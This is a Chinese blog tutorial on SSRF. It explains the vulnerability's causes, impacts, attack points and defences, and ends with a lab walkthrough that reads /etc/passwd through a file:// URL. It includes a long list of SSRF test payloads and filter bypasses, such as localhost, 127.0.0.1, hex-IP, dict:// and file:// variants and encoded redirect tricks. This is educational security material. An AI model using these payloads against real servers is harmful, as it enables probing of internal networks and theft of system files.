Web安全基础学习:SSRF服务端请求伪造漏洞

最新推荐文章于 2024-07-03 16:11:26 发布
最新推荐文章于 2024-07-03 16:11:26 发布
阅读量791 收藏 16
点赞数 26
分类专栏: Pilot-Web 文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51862722/article/details/139768567
版权

理论基础

  • SSRF漏洞介绍

    SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,利用服务器端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而外网隔离的内部系统)。

  • SSRF漏洞原理

    SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用发起请求获取数据的功能,但没有对目标地址做过滤与限制。攻击者在访问Web服务器(A)的特定功能时,构造恶意payload致使由A发起对内部网络中系统B(内网隔离,外部不可访问)的请求,从而获取敏感信息。此时A被作为中间人(跳板)进行利用。

    简而言之:SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。

  • SSRF漏洞危害(利用方式)
    1. 对外网及服务器所在内网进行端口扫描(逐个试探),获取一些服务的banner信息。
    2. 攻击运行在内网或本地的应用程序。
    3. 对内网Web应用进行指纹识别,识别企业内部的资产信息,通过访问默认文件实现(如:readme文件)。
    4. 攻击内、外网的Web应用,主要是使用HTTP GET请求就可以实现的攻击(比如strust2、SQL注入等)。
    5. 下载内网资源,利用file协议读取本地文件或资源等。
    6. 内部任意主机的任意端口发送精心构造的Payload。
    7. DOS攻击(请求大文件,始终保持连接Keep-Alive Always)。
    8. 进行跳板。
    9. 利用Redis未授权访问,HTTP CRLF注入等实现GetShell。
  • SSRF常见攻击点(测试点)

    1. 社交分享功能:获取超链接的标题等内容进行显示。

    2. 转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览。

    3. 在线翻译:给网址翻译对应网页的内容。

    4. 图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片。

    5. 图片/文章收藏功能:主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验。

    6. 云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行SSRF测试。

    7. 网站采集,网站抓取的地方:一些网站会针对你输入的URL进行一些信息采集工作。

    8. 数据库内置功能:数据库的比如mongodb的copyDatabase函数。

    9. 邮件系统:比如接收邮件服务器地址。

    10. 编码处理, 属性信息处理,文件处理:比如ffpmg,ImageMagick,docx,pdf,xml处理器等。

    11. 未公开的api实现以及其他扩展调用URL的功能,可以利用google 语法加上这些关键字去寻找SSRF漏洞。一些的url中的关键字:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……

  • SSRF测试常用Payload及简单绕过手法

    https://pilot.com
http://pilot.com
http://www.example.com.pilot.com
https://www.example.com.pilot.com
http://pilot.com/www.example.com
https://pilot.com/www.example.com
http://www.example.com?url=http://pilot.com
https://www.example.com?url=https://pilot.com
/pilot.com
//pilot.com
///pilot.com
pilot.com
///pilot.com//..
pilot.com//..
http://www.example.com@www.pilot.com
https://www.example.com@www.pilot.com
http://www.pilot.com\www.example.com
https://www.pilot.com\www.example.com
http://www.pilot.com#www.example.com
https://www.pilot.com#www.example.com
http://www.pilot.com?www.example.com
https://www.pilot.com?www.example.com
http://www.pilot.com\\www.example.com
https://www.pilot.com\\www.example.com
.pilot.com
.baidu
127.0.0.1
127.0.0.1:80
http://localhost
https://localhost
0x7f.0.0.1
0
0.0.0.0
dict://127.0.0.1:80
file://etc/passwd
//example.com@google.com/%2f..
///google.com/%2f..
///example.com@google.com/%2f..
google.com/%2f..
https://google.com/%2f..
https://example.com@google.com/%2f..
/https://google.com/%2f..
/https://example.com@google.com/%2f..
//google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
google.com/%2f%2e%2e
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/%09/example.com
/%2f%2fexample.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
%09/example.com
%5cexample.com
/example.com
/example.com/
\;@example.com
example.com/

  • SSRF的防御

    SSRF的防御比较复杂,需要根据业务实际场景来采取不同的方案,不同的代码有不同的修补策略。常规的修复方案如下:

    1. 限制协议为HTTP、HTTPS,禁用不需要的协议可以防止类似于file://, gopher://, ftp:// 等引起的问题。
    2. 禁止30x跳转。
    3. 设置URL白名单或者限制内网IP。
    4. 过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
    5. 限制请求的端口为http常用的端口,比如 80、443、8080、8090。
    6. 统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。

实践学习

漏洞环境以Pilot靶场为例:下载地址与部署教程

  1. 进入漏洞页面后,抓包,并点击链接留给初学者的一段话

    l1-1

  2. 发现请求了其他网页的文件内容,并展示在前端页面:

    l1-2

  3. 修改请求连接的参数url,尝试使用file://伪协议读取本地文件内容:

    l1-3

  4. 成功读取passwd文件。注意,这里只开放了file/http/https协议。

F4NQ1E
关注
  • 26
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF服务请求伪造攻击-漏洞银行大咖面对面10-Mat
07-31
SSRF服务请求伪造攻击-漏洞银行大咖面对面10-Mat
Web常规漏洞SSRF服务请求伪造漏洞
soldi_er的博客
09-16 908
文章目录参考 概念 —— 产生原因 ——可能存在漏洞的代码 ——漏洞分类 —— 潜在危害 漏洞利用 —— 漏洞防御 —— 漏洞绕过 概念:SSRF(Server-Side Request Forgery:服务请求伪造) 是一种利用漏洞伪造服务发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 漏洞产生原因:服务提供从其他服务器应用获取数据的功能,但没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容、加载指定地址的图片、下载等。 可能存在SSRF漏洞的PHP代码:
SSRF漏洞原理及其修复方式和加固方式
网络战争的博客
03-09 760
1. 输入验证和过滤:服务应用程序需要对从用户输入中获取的URL进行充分验证和过滤,确保只接受合法的URL。总之,修复和加固SSRF漏洞需要综合使用输入验证、过滤、限制协议和口、内网访问限制等技术手段,并采取更新组件、强制访问控制、安全审计和监控等措施来提高应用程序的安全性。SSRF漏洞的原理是,服务应用程序未对从用户输入中获取的URL进行充分验证和过滤,导致攻击者可以构造恶意的URL,使服务应用程序发送请求到攻击者指定的目标。可以使用白名单机制,只允许特定的协议和口。
008-Web安全基础4 - 请求伪造漏洞.pptx
10-11
SSRF是一种由攻击者构造形成由服务发起请求的一个安全漏洞 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统 可以对外网、内网、本地进行口扫描,某些情况下口的Banner会回显出来(比如3306的) 使用...
SSRF-Testing:SSRF服务请求伪造)测试资源
04-23
SSRF服务请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定口发送数据包、payload.├── ...
第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
自学黑客技术(网络安全
dexi1113的博客
06-24 2812
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
车辆网络安全开发
王小奎的博客
06-25 960
随着智能汽车的快速发展,车载软件的数量和复杂性不断增加,同时也带来了网络安全风险。智能汽车软件开发是实现车辆智能化、信息化的重要手段。在智能汽车软件的开发过程中,开发人员需要遵循一定的规范和标准,以确保软件的质量和安全性。其中,ISO21434是智能汽车软件开发的重要标准之一。ISO21434主要针对道路车辆的网络安全标准,旨在确保车辆在遭受网络攻击时,不会对车辆的网络安全造成威胁或导致安全问题。该标准详细规定了车辆网络安全管理体系、网络安全漏洞和风险管理、网络入侵检测和应对等方面的要求。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 659
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
NIST网络安全框架体系应用
weixin_48579910的博客
06-27 480
NIST网络安全框架通过识别、保护、检测、响应和恢复五个核心功能,为组织提供了全面的网络安全管理指导。通过实施这些核心功能,组织可以有效地管理和降低网络安全风险,保护关键资产和业务的安全与连续性。结合具体应用场景,实施针对性的安全措施,确保组织在面对网络安全威胁时具备足够的抵御能力。
网络安全 DVWA通关指南 Cross Site Request Forgery (CSRF)
YueXuan_521的博客
06-27 1103
网络安全 DVWA通关指南 Cross Site Request Forgery (CSRF) CSRF是跨站请求伪造攻击,由客户发起,是由于没有在执行关键操作时,进行是否由用户自愿发起的确认攻击者通过用户的浏览器来注入额外的网络请求,来破坏一个网站会话的完整性。比如某网站功能,没有验证Referer也没添加Token,攻击者可以用HTML构造恶意代码提交POST请求,诱骗已经登陆的受害者点击,可以直接修改用户信息。
湘潭大学信息与网络安全考试总结
学习记录
06-25 533
后面还有两门
网络安全筑基篇——反序列化漏洞
weixin_55762309的博客
06-27 807
反序列化漏洞原理详解
《网络安全法规与等保测评:如何确保合规性》
A526847的博客
06-30 683
为确保网络空间的稳定与安全,各国纷纷出台了一系列网络安全法规,其中《网络安全法》是我国网络安全领域的基本法律。同时,等保测评(网络安全等级保护测评)作为保障信息系统安全的重要手段,对于确保合规性起着至关重要的作用。本文将从网络安全法规与等保测评两个方面,探讨如何确保合规性。综上所述,确保网络安全合规性需要网络运营者深入理解网络安全法规、积极开展等保测评工作并加强内部管理与培训。网络安全法规是维护网络空间安全的基本准则,对于网络运营者而言,深入理解并遵守相关法规是确保合规性的前提。二、积极开展等保测评工作。
网络安全审计
weixin_48579910的博客
07-03 542
计算机信息系统安全保护能力的五个等级从自主保护到最高级别的监控保护,要求逐级递增。通过定期审计和评估,确保系统安全措施的有效实施和持续改进,可以有效保护系统免受各种安全威胁。网络安全审计机制和实现技术是确保计算机系统和网络环境的安全性、完整性和合规性的重要手段。通过系统地收集、分析和评估网络活动和系统日志,网络安全审计可以识别潜在的安全威胁和漏洞,并确保系统符合相关的安全标准和政策。以下是网络安全审计机制与实现技术的详细介绍。网络安全审计是确保信息系统安全的重要手段。
自学黑客(网络安全
最新发布
xv7676的博客
07-03 1029
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。此时我们的选择也可以很多,比如CSDN,比如知乎,再比如B站,都有很多人在分享自己的学习资料,但我觉得这里存在的很大一个问题就是不连贯、不完善,大部分免费分享的教程,都是东一块西一块,前言不搭后语,学着学着就蒙了,这是我自学之后的亲身感受。当然现在市面上很多网站都是PHP的开发的,所以选择PHP也是可以的。
深度探讨网络安全:挑战、防御策略与实战案例
2301_79181030的博客
06-28 1346
网络安全是一个复杂且不断变化的领域,它要求组织和个人保持警惕,并采取多层次、综合性的防御策略。从恶意软件防护到网络钓鱼防护,再到数据泄露防护,每个方面都需要我们投入足够的精力和资源。首先,恶意软件和病毒是网络安全中最常见的威胁之一。为了有效防护,我们需要定期更新防病毒软件,使用沙箱技术评估可疑程序,并定期对系统和应用程序进行安全审计。通过这些措施,我们可以及时发现并清除潜在的威胁,保护系统和数据的安全。其次,网络钓鱼攻击利用社会工程学原理欺骗用户,诱导他们点击恶意链接或下载病毒文件。
对于中小企业,如何符合等保2.0的等级划分和保护要求?
2301_79955948的博客
06-30 1055
等保2.0是中国针对网络安全等级保护的国家标准,旨在加强网络安全管理,提高网络安全防护能力。中小企业在实施等保2.0时,需要满足一系列基本安全控制措施,这些措施覆盖了物理安全、网络安全、主机安全、应用安全、数据安全、备份与恢复、个人数据保护、安全监测与事件响应等多个方面。等保2.0,即网络安全等级保护2.0,是中国政府为了加强网络安全管理而制定的一套标准。它旨在通过分类保护、分级管理的方式,确保网络安全的基本要求得到满足。
如何在src中挖掘高危漏洞.pdf
03-06
SSRF服务请求伪造漏洞允许攻击者通过服务器发起对外部服务请求,可能导致防火墙绕过、内网服务暴露、口扫描以及在某些情况下执行远程代码。全回显SSRF是指服务器返回整个响应,攻击者能看到所有信息;...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值